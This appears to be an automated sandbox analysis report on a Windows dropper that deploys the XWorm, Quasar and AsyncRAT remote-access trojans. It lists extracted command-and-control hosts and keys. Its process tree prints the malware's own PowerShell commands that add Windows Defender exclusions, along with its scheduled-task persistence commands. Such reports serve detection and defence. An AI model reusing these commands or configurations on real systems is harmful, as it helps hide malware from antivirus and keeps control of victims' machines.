asyncrat | 9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
27-06-2024 14:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fart.exe
Size

39.9MB
MD5

e1a72f7e4426c8d5e849459fa7c7e476
SHA1

e1101a053ebe7cf5dc44f4f4ea787be113cae10f
SHA256

9409521653887ec13272edd26f3768efb6f176b49b15a058dfcf69b9172faece
SHA512

0a2830e2f9e1872a98996f4221f1e81a33e8927e087397e7b3342fe79333974d030d8ff4176746c9cfd78eeb382d46a88023709c2e003b6a1ba00d883ee4426f
SSDEEP

786432:sxGPxJDr/A/brZCaMhEDL/BpYE0dkt3ZL3PDnsilllqs7GIKScPml8tBW:oGJJDrYPZCaEWLxVfDnplllpzMW

Score

10^/10

asyncrat quasar xworm default office04 slave execution rat spyware trojan

Malware Config

Extracted

Family

xworm

best-bird.gl.at.ply.gg:27196

super-nearest.gl.at.ply.gg:17835

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

stop-largely.gl.at.ply.gg:27116

Mutex

$Sxr-kl1r656AGsPQksTmi8

Attributes

encryption_key
ql4fQ8TV9ZFP9vRX2myA
install_name
$sxr~Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
$77STARTUP~MSF
subdirectory
$sxr~SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

history-foo.gl.at.ply.gg:42349

Mutex

2beddbf7-c691-4058-94c7-f54389b4a581

Attributes

encryption_key
CBFC5D217E55BEBDCD3A6EFA924299F76BC328D9
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Update
subdirectory
SubDir

Extracted

Family

asyncrat

Botnet

Default

finally-grande.gl.at.ply.gg:25844

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\mshta.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\svchost.exe	family_xworm
behavioral1/memory/4936-36-0x0000000000C20000-0x0000000000C38000-memory.dmp	family_xworm
behavioral1/memory/564-48-0x0000000000140000-0x000000000015A000-memory.dmp	family_xworm

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\hat.exe	family_quasar
C:\Users\Admin\AppData\Local\Temp\Client-built.exe	family_quasar
behavioral1/memory/2232-61-0x0000000000910000-0x000000000097C000-memory.dmp	family_quasar
behavioral1/memory/4124-63-0x0000000000930000-0x0000000000C54000-memory.dmp	family_quasar

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Async RAT payload 1 IoCs
rat

Processes:

resource yara_rule

C:\Users\Admin\AppData\Local\Temp\ONPE.exe family_asyncrat
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

4460 powershell.exe
4540 powershell.exe
2488 powershell.exe
4236 powershell.exe

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\ONPE.exe	family_asyncrat

pid	process
4460	powershell.exe
4540	powershell.exe
2488	powershell.exe
4236	powershell.exe

Checks computer location settings 2 TTPs 20 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Client-built.exesvchost.exemshta.exeClient-built.exehat.exehat.exefart.exeClient-built.exeClient-built.exehat.exehat.exeClient-built.exeClient-built.exehat.exehat.exehat.exeClient-built.exehat.exeClient-built.exeClient-built.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Client-built.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Client-built.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	hat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	hat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	fart.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Client-built.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Client-built.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	hat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	hat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Client-built.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Client-built.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	hat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	hat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	hat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Client-built.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	hat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Client-built.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Client-built.exe

Executes dropped EXE 21 IoCs

Processes:

hat.exemshta.exeONPE.exesvchost.exeClient-built.exeindex.exeClient-built.exeClient-built.exehat.exeClient-built.exehat.exehat.exeClient-built.exehat.exeClient-built.exehat.exeClient-built.exehat.exeClient-built.exehat.exeClient-built.exe

pid	process
2232	hat.exe
4936	mshta.exe
2412	ONPE.exe
564	svchost.exe
4124	Client-built.exe
5100	index.exe
1848	Client-built.exe
3264	Client-built.exe
3788	hat.exe
4172	Client-built.exe
4000	hat.exe
4188	hat.exe
1592	Client-built.exe
3468	hat.exe
4832	Client-built.exe
4432	hat.exe
2724	Client-built.exe
3208	hat.exe
4412	Client-built.exe
4804	hat.exe
3068	Client-built.exe

Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

5 ip-api.com
24 ip-api.com
29 ip-api.com
41 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
5	ip-api.com
24	ip-api.com
29	ip-api.com
41	ip-api.com

Program crash 8 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3236	2232	WerFault.exe	hat.exe
2152	3788	WerFault.exe	hat.exe
4276	4000	WerFault.exe	hat.exe
2376	4188	WerFault.exe	hat.exe
1104	3468	WerFault.exe	hat.exe
3256	4432	WerFault.exe	hat.exe
4120	3208	WerFault.exe	hat.exe
940	4804	WerFault.exe	hat.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1948 taskkill.exe

pid	process
1948	taskkill.exe

Runs ping.exe 1 TTPs 17 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
4920	PING.EXE
4384	PING.EXE
672	PING.EXE
1284	PING.EXE
3628	PING.EXE
3452	PING.EXE
4520	PING.EXE
5052	PING.EXE
896	PING.EXE
1828	PING.EXE
1132	PING.EXE
2540	PING.EXE
3916	PING.EXE
2440	PING.EXE
2060	PING.EXE
5036	PING.EXE
752	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2672 schtasks.exe
1720 schtasks.exe
3500 schtasks.exe
4860 schtasks.exe
4052 schtasks.exe
2844 schtasks.exe
1612 schtasks.exe
4440 schtasks.exe

pid	process
2672	schtasks.exe
1720	schtasks.exe
3500	schtasks.exe
4860	schtasks.exe
4052	schtasks.exe
2844	schtasks.exe
1612	schtasks.exe
4440	schtasks.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemshta.exesvchost.exe

pid	process
3124	powershell.exe
4196	powershell.exe
3124	powershell.exe
4196	powershell.exe
2488	powershell.exe
4236	powershell.exe
4236	powershell.exe
2488	powershell.exe
4540	powershell.exe
4460	powershell.exe
4540	powershell.exe
4460	powershell.exe
4936	mshta.exe
564	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Client-built.exemshta.exeONPE.exesvchost.exehat.exepowershell.exepowershell.exeWMIC.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exeClient-built.exeClient-built.exehat.exeClient-built.exehat.exehat.exeClient-built.exehat.exe

description	pid	process
Token: SeDebugPrivilege	4124	Client-built.exe
Token: SeDebugPrivilege	4936	mshta.exe
Token: SeDebugPrivilege	2412	ONPE.exe
Token: SeDebugPrivilege	564	svchost.exe
Token: SeDebugPrivilege	2232	hat.exe
Token: SeDebugPrivilege	3124	powershell.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeIncreaseQuotaPrivilege	896	WMIC.exe
Token: SeSecurityPrivilege	896	WMIC.exe
Token: SeTakeOwnershipPrivilege	896	WMIC.exe
Token: SeLoadDriverPrivilege	896	WMIC.exe
Token: SeSystemProfilePrivilege	896	WMIC.exe
Token: SeSystemtimePrivilege	896	WMIC.exe
Token: SeProfSingleProcessPrivilege	896	WMIC.exe
Token: SeIncBasePriorityPrivilege	896	WMIC.exe
Token: SeCreatePagefilePrivilege	896	WMIC.exe
Token: SeBackupPrivilege	896	WMIC.exe
Token: SeRestorePrivilege	896	WMIC.exe
Token: SeShutdownPrivilege	896	WMIC.exe
Token: SeDebugPrivilege	896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	896	WMIC.exe
Token: SeRemoteShutdownPrivilege	896	WMIC.exe
Token: SeUndockPrivilege	896	WMIC.exe
Token: SeManageVolumePrivilege	896	WMIC.exe
Token: 33	896	WMIC.exe
Token: 34	896	WMIC.exe
Token: 35	896	WMIC.exe
Token: 36	896	WMIC.exe
Token: SeIncreaseQuotaPrivilege	896	WMIC.exe
Token: SeSecurityPrivilege	896	WMIC.exe
Token: SeTakeOwnershipPrivilege	896	WMIC.exe
Token: SeLoadDriverPrivilege	896	WMIC.exe
Token: SeSystemProfilePrivilege	896	WMIC.exe
Token: SeSystemtimePrivilege	896	WMIC.exe
Token: SeProfSingleProcessPrivilege	896	WMIC.exe
Token: SeIncBasePriorityPrivilege	896	WMIC.exe
Token: SeCreatePagefilePrivilege	896	WMIC.exe
Token: SeBackupPrivilege	896	WMIC.exe
Token: SeRestorePrivilege	896	WMIC.exe
Token: SeShutdownPrivilege	896	WMIC.exe
Token: SeDebugPrivilege	896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	896	WMIC.exe
Token: SeRemoteShutdownPrivilege	896	WMIC.exe
Token: SeUndockPrivilege	896	WMIC.exe
Token: SeManageVolumePrivilege	896	WMIC.exe
Token: 33	896	WMIC.exe
Token: 34	896	WMIC.exe
Token: 35	896	WMIC.exe
Token: 36	896	WMIC.exe
Token: SeDebugPrivilege	1948	taskkill.exe
Token: SeDebugPrivilege	2488	powershell.exe
Token: SeDebugPrivilege	4236	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeDebugPrivilege	4936	mshta.exe
Token: SeDebugPrivilege	564	svchost.exe
Token: SeDebugPrivilege	1848	Client-built.exe
Token: SeDebugPrivilege	3264	Client-built.exe
Token: SeDebugPrivilege	3788	hat.exe
Token: SeDebugPrivilege	4172	Client-built.exe
Token: SeDebugPrivilege	4000	hat.exe
Token: SeDebugPrivilege	4188	hat.exe
Token: SeDebugPrivilege	1592	Client-built.exe
Token: SeDebugPrivilege	3468	hat.exe

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

Client-built.exemshta.exesvchost.exehat.exehat.exeClient-built.exehat.exehat.exeClient-built.exehat.exehat.exeClient-built.exehat.exeClient-built.exehat.exe

pid	process
4124	Client-built.exe
4936	mshta.exe
564	svchost.exe
2232	hat.exe
3788	hat.exe
4172	Client-built.exe
4000	hat.exe
4188	hat.exe
1592	Client-built.exe
3468	hat.exe
4432	hat.exe
2724	Client-built.exe
3208	hat.exe
4412	Client-built.exe
4804	hat.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

fart.exeindex.execmd.execmd.exepowershell.exepowershell.execsc.exeClient-built.execmd.exesvchost.exemshta.exeClient-built.execmd.exehat.execmd.exe

description	pid	process	target process
PID 3920 wrote to memory of 2232	3920	fart.exe	hat.exe
PID 3920 wrote to memory of 2232	3920	fart.exe	hat.exe
PID 3920 wrote to memory of 2232	3920	fart.exe	hat.exe
PID 3920 wrote to memory of 4936	3920	fart.exe	mshta.exe
PID 3920 wrote to memory of 4936	3920	fart.exe	mshta.exe
PID 3920 wrote to memory of 2412	3920	fart.exe	ONPE.exe
PID 3920 wrote to memory of 2412	3920	fart.exe	ONPE.exe
PID 3920 wrote to memory of 564	3920	fart.exe	svchost.exe
PID 3920 wrote to memory of 564	3920	fart.exe	svchost.exe
PID 3920 wrote to memory of 4124	3920	fart.exe	Client-built.exe
PID 3920 wrote to memory of 4124	3920	fart.exe	Client-built.exe
PID 3920 wrote to memory of 5100	3920	fart.exe	index.exe
PID 3920 wrote to memory of 5100	3920	fart.exe	index.exe
PID 5100 wrote to memory of 1700	5100	index.exe	cmd.exe
PID 5100 wrote to memory of 1700	5100	index.exe	cmd.exe
PID 5100 wrote to memory of 3236	5100	index.exe	cmd.exe
PID 5100 wrote to memory of 3236	5100	index.exe	cmd.exe
PID 1700 wrote to memory of 3124	1700	cmd.exe	powershell.exe
PID 1700 wrote to memory of 3124	1700	cmd.exe	powershell.exe
PID 3236 wrote to memory of 3876	3236	cmd.exe	findstr.exe
PID 3236 wrote to memory of 3876	3236	cmd.exe	findstr.exe
PID 3236 wrote to memory of 4196	3236	cmd.exe	powershell.exe
PID 3236 wrote to memory of 4196	3236	cmd.exe	powershell.exe
PID 4196 wrote to memory of 896	4196	powershell.exe	WMIC.exe
PID 4196 wrote to memory of 896	4196	powershell.exe	WMIC.exe
PID 3124 wrote to memory of 1196	3124	powershell.exe	csc.exe
PID 3124 wrote to memory of 1196	3124	powershell.exe	csc.exe
PID 4196 wrote to memory of 1948	4196	powershell.exe	taskkill.exe
PID 4196 wrote to memory of 1948	4196	powershell.exe	taskkill.exe
PID 1196 wrote to memory of 4816	1196	csc.exe	cvtres.exe
PID 1196 wrote to memory of 4816	1196	csc.exe	cvtres.exe
PID 4124 wrote to memory of 1872	4124	Client-built.exe	cmd.exe
PID 4124 wrote to memory of 1872	4124	Client-built.exe	cmd.exe
PID 1872 wrote to memory of 3228	1872	cmd.exe	chcp.com
PID 1872 wrote to memory of 3228	1872	cmd.exe	chcp.com
PID 1872 wrote to memory of 4920	1872	cmd.exe	PING.EXE
PID 1872 wrote to memory of 4920	1872	cmd.exe	PING.EXE
PID 564 wrote to memory of 2488	564	svchost.exe	powershell.exe
PID 564 wrote to memory of 2488	564	svchost.exe	powershell.exe
PID 4936 wrote to memory of 4236	4936	mshta.exe	powershell.exe
PID 4936 wrote to memory of 4236	4936	mshta.exe	powershell.exe
PID 564 wrote to memory of 4460	564	svchost.exe	powershell.exe
PID 564 wrote to memory of 4460	564	svchost.exe	powershell.exe
PID 4936 wrote to memory of 4540	4936	mshta.exe	powershell.exe
PID 4936 wrote to memory of 4540	4936	mshta.exe	powershell.exe
PID 1872 wrote to memory of 1848	1872	cmd.exe	Client-built.exe
PID 1872 wrote to memory of 1848	1872	cmd.exe	Client-built.exe
PID 1848 wrote to memory of 3208	1848	Client-built.exe	cmd.exe
PID 1848 wrote to memory of 3208	1848	Client-built.exe	cmd.exe
PID 3208 wrote to memory of 4484	3208	cmd.exe	chcp.com
PID 3208 wrote to memory of 4484	3208	cmd.exe	chcp.com
PID 3208 wrote to memory of 1132	3208	cmd.exe	PING.EXE
PID 3208 wrote to memory of 1132	3208	cmd.exe	PING.EXE
PID 2232 wrote to memory of 4860	2232	hat.exe	schtasks.exe
PID 2232 wrote to memory of 4860	2232	hat.exe	schtasks.exe
PID 2232 wrote to memory of 4860	2232	hat.exe	schtasks.exe
PID 2232 wrote to memory of 3968	2232	hat.exe	cmd.exe
PID 2232 wrote to memory of 3968	2232	hat.exe	cmd.exe
PID 2232 wrote to memory of 3968	2232	hat.exe	cmd.exe
PID 3968 wrote to memory of 1612	3968	cmd.exe	chcp.com
PID 3968 wrote to memory of 1612	3968	cmd.exe	chcp.com
PID 3968 wrote to memory of 1612	3968	cmd.exe	chcp.com
PID 3968 wrote to memory of 4384	3968	cmd.exe	PING.EXE
PID 3968 wrote to memory of 4384	3968	cmd.exe	PING.EXE

C:\Users\Admin\AppData\Local\Temp\fart.exe
"C:\Users\Admin\AppData\Local\Temp\fart.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3920

C:\Users\Admin\AppData\Local\Temp\hat.exe
"C:\Users\Admin\AppData\Local\Temp\hat.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2232

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$77STARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\hat.exe" /rl HIGHEST /f
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\75sO7lBSRYcT.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:3968

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:1612

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
4⤵
- Runs ping.exe
PID:4384

C:\Users\Admin\AppData\Local\Temp\hat.exe
"C:\Users\Admin\AppData\Local\Temp\hat.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3788

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$77STARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\hat.exe" /rl HIGHEST /f
5⤵
- Scheduled Task/Job: Scheduled Task
PID:4052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KrlBvrjG7Cls.bat" "
5⤵
PID:3888

C:\Windows\SysWOW64\chcp.com
chcp 65001
6⤵
PID:2052

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
6⤵
- Runs ping.exe
PID:3452

C:\Users\Admin\AppData\Local\Temp\hat.exe
"C:\Users\Admin\AppData\Local\Temp\hat.exe"
6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4000

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$77STARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\hat.exe" /rl HIGHEST /f
7⤵
- Scheduled Task/Job: Scheduled Task
PID:2844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lo47dEVP2AO2.bat" "
7⤵
PID:4920

C:\Windows\SysWOW64\chcp.com
chcp 65001
8⤵
PID:4464

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
8⤵
- Runs ping.exe
PID:5036

C:\Users\Admin\AppData\Local\Temp\hat.exe
"C:\Users\Admin\AppData\Local\Temp\hat.exe"
8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4188

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$77STARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\hat.exe" /rl HIGHEST /f
9⤵
- Scheduled Task/Job: Scheduled Task
PID:1612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lQYmZ2ouSU2f.bat" "
9⤵
PID:4852

C:\Windows\SysWOW64\chcp.com
chcp 65001
10⤵
PID:1224

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
10⤵
- Runs ping.exe
PID:4520

C:\Users\Admin\AppData\Local\Temp\hat.exe
"C:\Users\Admin\AppData\Local\Temp\hat.exe"
10⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3468

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$77STARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\hat.exe" /rl HIGHEST /f
11⤵
- Scheduled Task/Job: Scheduled Task
PID:4440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ncfjerNzhxVc.bat" "
11⤵
PID:5024

C:\Windows\SysWOW64\chcp.com
chcp 65001
12⤵
PID:1376

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
12⤵
- Runs ping.exe
PID:3916

C:\Users\Admin\AppData\Local\Temp\hat.exe
"C:\Users\Admin\AppData\Local\Temp\hat.exe"
12⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4432

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$77STARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\hat.exe" /rl HIGHEST /f
13⤵
- Scheduled Task/Job: Scheduled Task
PID:2672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fDHsWofbmx2H.bat" "
13⤵
PID:4484

C:\Windows\SysWOW64\chcp.com
chcp 65001
14⤵
PID:4540

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
14⤵
- Runs ping.exe
PID:2440

C:\Users\Admin\AppData\Local\Temp\hat.exe
"C:\Users\Admin\AppData\Local\Temp\hat.exe"
14⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3208

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$77STARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\hat.exe" /rl HIGHEST /f
15⤵
- Scheduled Task/Job: Scheduled Task
PID:1720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HCVuK4zW8Sq5.bat" "
15⤵
PID:2856

C:\Windows\SysWOW64\chcp.com
chcp 65001
16⤵
PID:4852

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
16⤵
- Runs ping.exe
PID:5052

C:\Users\Admin\AppData\Local\Temp\hat.exe
"C:\Users\Admin\AppData\Local\Temp\hat.exe"
16⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4804

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$77STARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\hat.exe" /rl HIGHEST /f
17⤵
- Scheduled Task/Job: Scheduled Task
PID:3500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XRMhKXFiIGCZ.bat" "
17⤵
PID:4900

C:\Windows\SysWOW64\chcp.com
chcp 65001
18⤵
PID:4472

C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
18⤵
- Runs ping.exe
PID:1828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4804 -s 2248
17⤵
- Program crash
PID:940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 2196
15⤵
- Program crash
PID:4120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 2200
13⤵
- Program crash
PID:3256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 2224
11⤵
- Program crash
PID:1104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 1668
9⤵
- Program crash
PID:2376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4000 -s 2172
7⤵
- Program crash
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3788 -s 2148
5⤵
- Program crash
PID:2152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 1952
3⤵
- Program crash
PID:3236

C:\Users\Admin\AppData\Local\Temp\mshta.exe
"C:\Users\Admin\AppData\Local\Temp\mshta.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mshta.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540

C:\Users\Admin\AppData\Local\Temp\ONPE.exe
"C:\Users\Admin\AppData\Local\Temp\ONPE.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Users\Admin\AppData\Local\Temp\Client-built.exe
"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FBeisFyBpFgj.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1872

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:3228

C:\Windows\system32\PING.EXE
ping -n 10 localhost
4⤵
- Runs ping.exe
PID:4920

